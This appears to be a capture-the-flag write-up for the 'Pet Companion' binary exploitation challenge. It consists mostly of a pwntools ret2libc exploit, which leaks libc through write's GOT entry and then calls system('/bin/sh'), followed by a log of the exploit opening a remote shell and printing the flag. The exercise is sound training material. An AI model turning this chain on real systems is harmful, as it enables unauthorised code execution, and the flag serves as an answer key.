Pet Companion
Last updated
Was this helpful?
Last updated
Was this helpful?
Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.from pwn import *
def start(argv=[], *a, **kw) :
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
# Set up pwntools for the correct architecture
exe = './pet_companion'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# Lib-C library
libc = ELF('libc.so.6') # Local
offset = 72
# Start program
io = start()
# POP RDI from ropper
ret = 0x4004de
pop_rdi = 0x400743
pop_rsi = 0x400741
# Payload to leak libc function
# write takes 3 arguments the second arg is what it will print to the screen
payload = flat({
offset: [
pop_rsi,
elf.got.write,
elf.got.write,
elf.plt.write,
elf.symbols.main
]
})
# Send the payload
io.sendlineafter(b'status: ', payload)
# Retrieve got.write address
io.recvline()
io.recvline()
io.recvline()
got_write = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_write: %#x", got_write)
# # # Subtract puts offset to get libc base
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)
# System(/bin/sh)
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)
# Payload to get shell
payload = flat({
offset: [
pop_rdi,
bin_sh,
libc.symbols.system
]
})
# Send the payload
io.sendline(payload)
# Got Shell?
io.interactive()┌──(kali㉿kali)-[~/ctf/pwn/pet]
└─$ python exploit.py REMOTE 94.237.53.81 48634
[*] '/home/kali/ctf/pwn/pet/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 94.237.53.81 on port 48634: Done
[*] leaked got_write: 0x7fc5bdb920f0
[*] libc_base: 0x7fc5bda82000
[*] system_addr: 0x7fc5bdad1420
[*] bin_sh: 0x7fc5bdc35d88
[*] Switching to interactive mode
[*] Configuring...
$ ls
flag.txt
glibc
pet_companion
$ cat flag.txt
HTB{c0nf1gur3_w3r_d0g}
$ HTB{c0nf1gur3_w3r_d0g}